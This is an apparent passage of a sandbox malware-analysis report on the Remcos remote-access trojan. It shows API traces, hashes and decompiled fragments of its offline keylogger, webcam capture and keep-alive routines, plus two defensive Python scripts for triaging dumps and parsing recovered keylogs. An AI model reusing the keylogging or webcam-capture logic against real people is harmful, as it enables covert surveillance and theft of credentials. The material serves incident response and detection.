                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60 ref: 00401CD9
                                  • ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000004,6B015DF0), ref: 00401CF1
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B310), ref: 00401D01
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401D10
                                    • Part of subcall function 004129EB: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 004129FA
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A11
                                    • Part of subcall function 004129EB: ?find@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIABV12@I@Z.MSVCP60(?,00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5), ref: 00412A27
                                    • Part of subcall function 004129EB: ?substr@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBE?AV12@II@Z.MSVCP60(?,00000000,00000000), ref: 00412A45
                                    • Part of subcall function 004129EB: ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A4F
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A58
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A6D
                                    • Part of subcall function 004129EB: ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412A7A
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ACC
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412AD5
                                    • Part of subcall function 004129EB: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,?,?,?,?,?,?,00408CD5,?), ref: 00412ADE
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401D60
                                  • atoi.MSVCRT ref: 00401D67
                                  • Sleep.KERNEL32 ref: 00401D76
                                    • Part of subcall function 00401EA2: _EH_prolog.MSVCRT ref: 00401EA7
                                    • Part of subcall function 00401EA2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000000,?), ref: 00401EDE
                                    • Part of subcall function 00401EA2: ?size@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(0041B310,?,0041B310,0041B290), ref: 00401F05
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F1C
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F29
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F36
                                    • Part of subcall function 00401EA2: ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 00401F40
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000060), ref: 00401F55
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F5E
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F67
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F70
                                    • Part of subcall function 00401EA2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401F79
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401DAD
                                  • atoi.MSVCRT ref: 00401DB4
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 00401DD5
                                  • ?data@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000), ref: 00401E0F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290,00000000,CloseCamera,00000000,OpenCamera), ref: 00401E73
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E8E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401E97
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@$V01@@$D@2@@0@Hstd@@V10@0@V?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@V12@$?substr@?$basic_string@D@1@@atoi$??4?$basic_string@?data@?$basic_string@?find@?$basic_string@?size@?$basic_string@H_prologSleepV01@
                                  • String ID: CloseCamera$FreeFrame$GetFrame$OpenCamera
                                  • API String ID: 3050406488-3547787478
                                  • Opcode ID: feac5231df2058003bd33fe0bbb70bc691d3bf8f72aa97f1516ee4c4915568a4
                                  • Instruction ID: 929695bb366bec32bbf7bff6ad9df781dd06acba2e16bfd5a529381622b13abb
                                  • Opcode Fuzzy Hash: feac5231df2058003bd33fe0bbb70bc691d3bf8f72aa97f1516ee4c4915568a4
                                  • Instruction Fuzzy Hash: A7417231A00609DBCB00ABB5EC4DAED3B65EF54344F00847BE816A72E1DB789545C7DD
                                  Uniqueness

                                  Uniqueness Score: -1.00%
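The two decompiled functions above leak the strings an analyst would pivot on when triaging the dump they were recovered from (00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp): the cookie wiper's "[IE cookies cleared!]" / "[IE cookies not found]" status strings and the "User Shell Folders" registry path, and the webcam module's OpenCamera, CloseCamera, GetFrame and FreeFrame export names that E00407033 resolves at runtime. Before reading decompiles, a practitioner usually wants to know which of these capability groups is present in a given dump at all. The script below is an added example for this page, not part of the Joe Sandbox report or of Remcos; the grouping of strings into capabilities is an analyst's assumption drawn from the functions in this section, and the sample blob is constructed.

```python
"""Triage a process dump for the Remcos capability strings seen in this report.

Added example, not part of the report or of Remcos. The strings come from the
decompiled functions above; the capability labels and the sample blob are
assumptions made for the demonstration."""
from typing import Dict, List, Tuple

# Strings recovered from the decompiled functions, grouped by the capability
# they indicate (grouping is the analyst's assumption, not a Remcos constant).
CAPABILITY_STRINGS: Dict[str, List[str]] = {
    "ie_cookie_wiper": [
        "[IE cookies cleared!]",
        "[IE cookies not found]",
        r"Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders",
    ],
    "webcam_capture": ["OpenCamera", "CloseCamera", "GetFrame", "FreeFrame"],
    "offline_keylogger": [
        "Offline Keylogger Started",
        "[%04i/%02i/%02i %02i:%02i:%02i ",
    ],
}


def find_all(haystack: bytes, needle: bytes) -> List[int]:
    """Return every offset at which needle occurs (overlapping hits allowed)."""
    offsets: List[int] = []
    pos = haystack.find(needle)
    while pos != -1:
        offsets.append(pos)
        pos = haystack.find(needle, pos + 1)
    return offsets


def scan_dump(data: bytes) -> Dict[str, List[Tuple[str, str, int]]]:
    """Map capability -> list of (string, encoding, offset) hits.

    Each string is searched both as ASCII and as UTF-16LE, because the decompile
    shows narrow (basic_string<char>) and wide (basic_string<wchar_t>) paths
    side by side in this binary."""
    hits: Dict[str, List[Tuple[str, str, int]]] = {}
    for capability, strings in CAPABILITY_STRINGS.items():
        for s in strings:
            for label, codec in (("ascii", "ascii"), ("utf-16le", "utf-16-le")):
                for off in find_all(data, s.encode(codec)):
                    hits.setdefault(capability, []).append((s, label, off))
    return hits


def capabilities_present(data: bytes, min_hits: int = 1) -> List[str]:
    """Capabilities for which at least min_hits distinct strings were found.

    A threshold above 1 reduces false positives from a single generic string
    (e.g. the User Shell Folders key also appears in benign software)."""
    found = scan_dump(data)
    return sorted(
        cap for cap, h in found.items() if len({s for s, _, _ in h}) >= min_hits
    )


# Constructed test blob (not real dump content): export names as ASCII, the
# keylogger marker as ASCII, and one cookie-wiper string as UTF-16LE.
SAMPLE_DUMP = (
    b"\x00" * 16
    + b"OpenCamera\x00CloseCamera\x00GetFrame\x00FreeFrame\x00"
    + b"\x90" * 8
    + b"Offline Keylogger Started\x00"
    + "[IE cookies cleared!]".encode("utf-16-le")
    + b"\xcc" * 4
)

if __name__ == "__main__":
    for cap, cap_hits in scan_dump(SAMPLE_DUMP).items():
        for s, enc, off in cap_hits:
            print(f"{cap:18s} {enc:8s} 0x{off:08x} {s!r}")
    print("capabilities:", capabilities_present(SAMPLE_DUMP, min_hits=2))
```

Run it against a real dump with `scan_dump(open(path, "rb").read())`; the offsets let you jump straight to the referencing code in the disassembler, and the `min_hits` threshold is the knob that keeps a lone "User Shell Folders" hit from being reported as a cookie wiper.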

                                  C-Code - Quality: 33%
                                  			E00405DD3(void* __ecx, char _a4) {
                                  				struct _SYSTEMTIME _v20;
                                  				char _v36;
                                  				char _v52;
                                  				char* _t24;
                                  				char* _t25;
                                  				char* _t33;
                                  				int _t34;
                                  				void* _t46;
                                  				void* _t47;
                                  
                                  				_t47 = __ecx;
                                  				GetLocalTime( &_v20);
                                  				_t24 =  &_v52;
                                  				L00414176();
                                  				_t25 =  &_v36;
                                  				L00414170();
                                  				__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z(_t25, _t25, _t24, _t24, "\r\n[%04i/%02i/%02i %02i:%02i:%02i ",  &_a4, "]\r\n");
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				__imp__?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ();
                                  				_t46 = malloc(_t25 + 0x64);
                                  				_t33 = _v20.wYear & 0x0000ffff;
                                  				__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t33, _v20.wMonth & 0x0000ffff, _v20.wDay & 0x0000ffff, _v20.wHour & 0x0000ffff, _v20.wMinute & 0x0000ffff, _v20.wSecond & 0x0000ffff);
                                  				_t34 = sprintf(_t46, _t33);
                                  				if( *((char*)(_t47 + 0x3c)) != 0) {
                                  					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                  				}
                                  				if( *((char*)(_t47 + 0x3d)) != 0) {
                                  					__imp__??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(_t46);
                                  					_t20 = _t47 + 0x34; // 0x0
                                  					_t34 = SetEvent( *_t20);
                                  				}
                                  				free(_t46);
                                  				__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  				return _t34;
                                  			}

                                  APIs
                                  • GetLocalTime.KERNEL32(?,73B743E0,Offline Keylogger Started,?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DE1
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBDABV10@@Z.MSVCP60(?,[%04i/%02i/%02i %02i:%02i:%02i ,?,],?,?,?,?,?,?,?,?,?,?,?,004051C6), ref: 00405DF9
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,?,]), ref: 00405E06
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,?,?,?,?,?,]), ref: 00405E12
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E1B
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,]), ref: 00405E24
                                  • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(?,?,?,?,?,]), ref: 00405E2D
                                  • malloc.MSVCRT ref: 00405E37
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,?,004051C6,?,?,?,?,]), ref: 00405E61
                                  • sprintf.MSVCRT ref: 00405E69
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E7C
                                  • ??Y?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00000000), ref: 00405E8C
                                  • SetEvent.KERNEL32(00000000), ref: 00405E95
                                  • free.MSVCRT(00000000), ref: 00405E9C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00405EA6
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??1?$basic_string@V01@$D@2@@0@Hstd@@V?$basic_string@Y?$basic_string@$??4?$basic_string@?c_str@?$basic_string@?length@?$basic_string@EventLocalTimeV01@@V10@V10@@freemallocsprintf
                                  • String ID: [%04i/%02i/%02i %02i:%02i:%02i $Offline Keylogger Started$]
                                  • API String ID: 2201004561-248792730
                                  • Opcode ID: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction ID: 187d607a52c4f966b55e3f01ad30cf50bd50e30255d112ea0a9885b9183f1b4a
                                  • Opcode Fuzzy Hash: d1962dcfa14961cf68a21e729b42b9462e143896443955e606cf191a9ecd47ee
                                  • Instruction Fuzzy Hash: F6213676800619FFCB109B94ED49DFE7BBCFF54745B04442AF952D20A0DB789644CB68
                                  Uniqueness

                                  Uniqueness Score: -1.00%
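E00405DD3 above builds each offline-keylogger record from the format string "\r\n[%04i/%02i/%02i %02i:%02i:%02i " filled from GetLocalTime, followed by the caller-supplied text in _a4 (here "Offline Keylogger Started") and "]\r\n", then appends it to the in-memory log buffers and signals an event. When such a log is recovered during incident response, the first task is to split it back into timestamped records. The parser below is an added example for this page, not code from the report or from Remcos; the header layout is taken from the decompiled format strings, while the assumptions that later headers carry window titles, that keystrokes follow each header up to the next one, and the "[Enter]" / "[Tab]" key names in the constructed sample are the author's, not values taken from the report.

```python
"""Parse Remcos offline-keylogger records laid out as in E00405DD3.

Added example for this report, not Remcos code. The header layout is taken
from the decompiled format strings; everything about the record body is an
assumption, marked in the comments."""
import re
from dataclasses import dataclass
from datetime import datetime
from typing import List, Optional

# "\r\n[%04i/%02i/%02i %02i:%02i:%02i " + text + "]\r\n", per the decompile.
# The text group is non-greedy, so a "]" inside a window title is tolerated as
# long as it is not immediately followed by CRLF.
HEADER_RE = re.compile(
    rb"\r\n\[(\d{4})/(\d{2})/(\d{2}) (\d{2}):(\d{2}):(\d{2}) (.*?)\]\r\n"
)


@dataclass
class KeylogEntry:
    timestamp: Optional[datetime]  # None if the header carried an impossible date
    header: str                    # "Offline Keylogger Started" or (assumed) a window title
    keystrokes: str                # assumed: text logged until the next header
    offset: int                    # byte offset of the header within the log


def parse_keylog(data: bytes) -> List[KeylogEntry]:
    """Split a log blob into entries.

    Bytes are decoded as latin-1 so that non-UTF-8 keystroke data is kept
    rather than raising during triage."""
    headers = list(HEADER_RE.finditer(data))
    entries: List[KeylogEntry] = []
    for i, m in enumerate(headers):
        y, mo, d, h, mi, s = (int(g) for g in m.groups()[:6])
        try:
            ts: Optional[datetime] = datetime(y, mo, d, h, mi, s)
        except ValueError:  # corrupted or tampered header: keep the record anyway
            ts = None
        body_end = headers[i + 1].start() if i + 1 < len(headers) else len(data)
        entries.append(
            KeylogEntry(
                timestamp=ts,
                header=m.group(7).decode("latin-1"),
                keystrokes=data[m.end():body_end].decode("latin-1"),
                offset=m.start(),
            )
        )
    return entries


def sessions(entries: List[KeylogEntry]) -> List[List[KeylogEntry]]:
    """Group entries into capture sessions, starting a new group at each
    "Offline Keylogger Started" marker (the string seen in the decompile)."""
    groups: List[List[KeylogEntry]] = []
    for e in entries:
        if e.header == "Offline Keylogger Started" or not groups:
            groups.append([])
        groups[-1].append(e)
    return groups


# Constructed sample log. Window titles and the "[Enter]"/"[Tab]" key names are
# assumptions for the demonstration, not values observed in the report.
SAMPLE_LOG = (
    b"\r\n[2020/11/20 14:03:07 Offline Keylogger Started]\r\n"
    b"\r\n[2020/11/20 14:03:21 Untitled - Notepad]\r\nhello world[Enter]"
    b"\r\n[2020/11/20 14:05:02 Login - Mozilla Firefox]\r\nuser@example.com[Tab]Passw0rd!"
    b"\r\n[2020/11/21 09:12:44 Offline Keylogger Started]\r\n"
    b"\r\n[2020/11/21 09:13:00 cmd.exe]\r\nwhoami[Enter]"
)

if __name__ == "__main__":
    for n, group in enumerate(sessions(parse_keylog(SAMPLE_LOG)), 1):
        print(f"session {n}")
        for e in group:
            print(f"  {e.timestamp} {e.header!r}: {e.keystrokes!r}")
```

The timestamps come from GetLocalTime on the victim host, so they are in the victim's local time zone with no offset recorded; convert them before correlating with other evidence.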

                                  APIs
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040123B
                                  • closesocket.WS2_32 ref: 00401266
                                  • ExitThread.KERNEL32 ref: 00401274
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(?,00000020,?,0041B310,00000000), ref: 0040129D
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDIABV?$allocator@D@1@@Z.MSVCP60(Function_0001B218,00000012,?,0041B310,00000000), ref: 004012B3
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012BE
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012CB
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012D8
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@0@Z.MSVCP60(?,00000000), ref: 004012E5
                                  • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000), ref: 004012F1
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004012FA
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401303
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040130C
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401315
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040131E
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00401327
                                  • waveInUnprepareHeader.WINMM(-0041B1DC,00000020), ref: 00401344
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00401369
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004013B3
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@D@2@@0@Hstd@@V10@0@V?$basic_string@$D@1@@$V01@@$??4?$basic_string@ExitHeaderThreadUnprepareV01@closesocketwave
                                  • String ID:
                                  • API String ID: 3470141593-0
                                  • Opcode ID: 8c77ea33ad519ed9651320f964817777c92f5b7bf297cb9656444f3f3f4721e9
                                  • Instruction ID: 5b0032f0df5236073d26c2de6242c8c0ab4ccdf0beb3001a3256587e9f107884
                                  • Opcode Fuzzy Hash: 8c77ea33ad519ed9651320f964817777c92f5b7bf297cb9656444f3f3f4721e9
                                  • Instruction Fuzzy Hash: 7741347290010DEBDB01EBE1ED5EEDE7778EB54345F108136F902A31A1DB745A48CB99
                                  Uniqueness

                                  Uniqueness Score: -1.00%

                                  C-Code - Quality: 28%
                                  			E00402637(void* __ecx, intOrPtr _a4) {
                                  				char _v5;
                                  				struct _SYSTEMTIME _v24;
                                  				char _v40;
                                  				char _v56;
                                  				char* _t42;
                                  				char* _t43;
                                  				char* _t50;
                                  				char* _t51;
                                  				void* _t68;
                                  				void* _t69;
                                  
                                  				_t68 = __ecx;
                                  				if( *((char*)(__ecx + 0x38)) == 0) {
                                  					return 0;
                                  				}
                                  				if( *0x41bcac != 0) {
                                  					if( *((char*)(__ecx + 0x44)) != 0) {
                                  						GetLocalTime( &_v24);
                                  						_t50 =  &_v5;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t50, "KeepAlive Enabled! Timeout: %i seconds\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                  						_t51 =  &_v40;
                                  						L00414170();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t51, _t50);
                                  						printf(_t51);
                                  						_t69 = _t69 + 0x24;
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						 *(_t68 + 0x44) =  *(_t68 + 0x44) & 0x00000000;
                                  					}
                                  					_t16 = _t68 + 0x3c; // 0xa
                                  					if( *_t16 != _a4) {
                                  						GetLocalTime( &_v24);
                                  						_t42 =  &_v5;
                                  						__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z("%02i:%02i:%02i:%03i [INFO] ", _t42, "KeepAlive Timeout changed to %i\n", _v24.wHour & 0x0000ffff, _v24.wMinute & 0x0000ffff, _v24.wSecond & 0x0000ffff, _v24.wMilliseconds & 0x0000ffff, _a4);
                                  						_t43 =  &_v56;
                                  						L00414170();
                                  						__imp__?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ(_t43, _t42);
                                  						printf(_t43);
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  						__imp__??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ();
                                  					}
                                  				}
                                  				 *(_t68 + 0x40) =  *(_t68 + 0x40) & 0x00000000;
                                  				 *((intOrPtr*)(_t68 + 0x3c)) = _a4;
                                  				return 1;
                                  			}
                                  Instruction addresses for the listing above: 0x0040263e, 0x00402644, 0x00000000, 0x00402749, 0x00402653, 0x00402669, 0x0040266f, 0x0040268b, 0x00402699, 0x004026a0, 0x004026a4, 0x004026ae, 0x004026b5, 0x004026b7, 0x004026bd, 0x004026c6, 0x004026cc, 0x004026cc, 0x004026d0, 0x004026d6, 0x004026dc, 0x004026f8, 0x00402706, 0x0040270d, 0x00402711, 0x0040271b, 0x00402722, 0x0040272a, 0x00402733, 0x00402733, 0x004026d6, 0x0040273c, 0x00402740, 0x00000000

                                  APIs
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 0040266F
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Enabled! Timeout: %i seconds,?,?,?,?,?,?,00000000,0041BE70), ref: 00402699
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 004026A4
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 004026AE
                                  • printf.MSVCRT ref: 004026B5
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026BD
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004026C6
                                  • GetLocalTime.KERNEL32(?,?,00000000,0041BE70), ref: 004026DC
                                  • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(%02i:%02i:%02i:%03i [INFO] ,?,KeepAlive Timeout changed to %i,?,?,?,?,?,?,00000000,0041BE70), ref: 00402706
                                  • ??Hstd@@YA?AV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@ABV10@PBD@Z.MSVCP60(?,00000000,?,00000000,0041BE70), ref: 00402711
                                  • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,00000000,0041BE70,?,?,?,?,?,?,?,?,?,?,?,?,0040D49C), ref: 0040271B
                                  • printf.MSVCRT ref: 00402722
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040272A
                                  • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 00402733
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000002.00000002.920845275.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                  Yara matches
                                  Similarity
                                  • API ID: V?$allocator@$D@std@@U?$char_traits@$D@2@@std@@$??1?$basic_string@$??0?$basic_string@?c_str@?$basic_string@D@1@@D@2@@0@Hstd@@LocalTimeV10@V?$basic_string@printf
                                  • String ID: %02i:%02i:%02i:%03i [INFO] $KeepAlive Enabled! Timeout: %i seconds$KeepAlive Timeout changed to %i
                                  • API String ID: 1710008465-2297210016
                                  • Opcode ID: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
                                  • Instruction ID: 321b724c115d66eaa185a9bbc978540a18db294c5fd1e2a1f117f764d6d2d181
                                  • Opcode Fuzzy Hash: 45bbf99334adb761e407a604f487fabbbe6a046893022ab2e2554ba2dfb37768
